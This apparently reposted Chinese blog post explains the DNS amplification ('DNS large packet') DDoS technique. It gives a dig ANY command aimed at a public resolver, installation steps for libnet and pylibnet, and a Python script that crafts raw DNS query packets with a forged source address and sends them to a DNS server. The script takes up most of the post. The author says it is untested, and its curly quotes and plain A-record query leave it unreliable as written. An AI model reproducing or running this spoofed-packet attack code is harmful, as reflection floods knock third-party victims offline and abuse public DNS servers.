1 前言
DDOS攻击里面有一招叫:DNS大包攻击;具体原理为:构造DNS请求报文,发送到公网的DNS服务器上面,请求具有返回大量数据报文的dns请求(比如:dig ANY isc.org +notcp +bufsize=4096 @8.8.8.8);
2 基础环境安装
2.1 安装libnet:
下载地址:http://sourceforge.net/projects/libnet-dev/
# tar zxvf libnet-1.2-rc3.tar.gz
# cd libnet-1.2-rc3
# ./configure
# make
# make install
2.2 安装pylibnet:
下载地址:http://sourceforge.net/projects/pylibnet/
# tar zxvf pylibnet-3.0-beta-rc1.tar.gz
# cd pylibnet-3.0-beta-rc1
# python setup.py install;
3 编写测试
代码如下:
#!/usr/bin/python
import sys
import libnet
from libnet.constants import *
l = libnet.context(
RAW4, # The injection type
‘eth0′ # Device name
)
dst_ip = l.name2addr4(
‘223.236.117.2’, # Let’s get the network byte ordered representation of this IP
DONT_RESOLVE
)
src_ip = l.name2addr4(
‘10.0.0.31’, # Let’s get the network byte ordered representation of this IP
DONT_RESOLVE
)
#query
import struct
query=struct.pack(‘b3sb4sb3sbbbbb’,3,’www’,4,’sina’,3,’com’,0,0,1,0,1)
dns_tag = l.build_dnsv4(
h_len=12,
id=2,
flags=256,
num_q=1,
num_anws_rr=0,
num_auth_rr=0,
num_addi_rr=0,
payload=query,
)
udp_tag = l.build_udp(
dp=53, # destination port
sum=0,
len=38,
)
# Now onto the IPv4 header
#ipv4_tag = l.autobuild_ipv4(
ipv4_tag = l.build_ipv4(
# len=IPV4_H + UDP_H + 12, # IPV4 packet length
prot=IPPROTO_UDP, # Protocol type
dst=dst_ip,
src=src_ip,
)
#send packet
l.write()
目前我还没有测试,有意向的同学可以移驾原文:http://bbs.chinaunix.net/forum.php?mod=viewthread&tid=1601787&ordertype=1
为了方便大家保存,www.zhoufengjie.cn上面的文章尽量都会做成pdf文档形式方便大家留存,尽最大方便给大家提供服务,本文文档(word原始文档)下载地址:点击下载